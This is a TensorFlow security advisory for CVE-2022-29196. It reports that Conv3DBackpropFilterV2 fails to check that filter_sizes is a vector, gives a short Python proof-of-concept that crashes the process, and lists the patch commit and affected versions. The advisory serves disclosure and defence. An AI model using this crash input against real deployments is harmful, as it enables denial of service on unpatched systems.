## TFSA-2022-070: Missing validation causes denial of service via `Conv3DBackpropFilterV2`

### CVE Number
CVE-2022-29196

### Impact
The implementation of [`tf.raw_ops.Conv3DBackpropFilterV2`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/conv_grad_ops_3d.cc) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack:

```python
import tensorflow as tf

tf.raw_ops.Conv3DBackpropFilterV2(
  input=tf.constant(.5053710941, shape=[2,2,2,2,1], dtype=tf.float16),
  filter_sizes=tf.constant(0, shape=[], dtype=tf.int32),
  out_backprop=tf.constant(.5053710941, shape=[2,2,2,2,1], dtype=tf.float16),
  strides=[1, 1, 1, 1, 1],
  padding="VALID",
  data_format="NDHWC",
  dilations=[1, 1, 1, 1, 1])
```

The code does not validate that the `filter_sizes` argument is a vector.

### Patches
We have patched the issue in GitHub commit [174c5096f303d5be7ed2ca2662b08371bff4ab88](https://github.com/tensorflow/tensorflow/commit/174c5096f303d5be7ed2ca2662b08371bff4ab88).

The fix will be included in TensorFlow 2.9.0. We will also cherrypick this commit on TensorFlow 2.8.1, TensorFlow 2.7.2, and TensorFlow 2.6.4, as these are also affected and still in supported range.

### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution
This vulnerability has been reported by Neophytos Christou from Secure Systems Lab at Brown University.
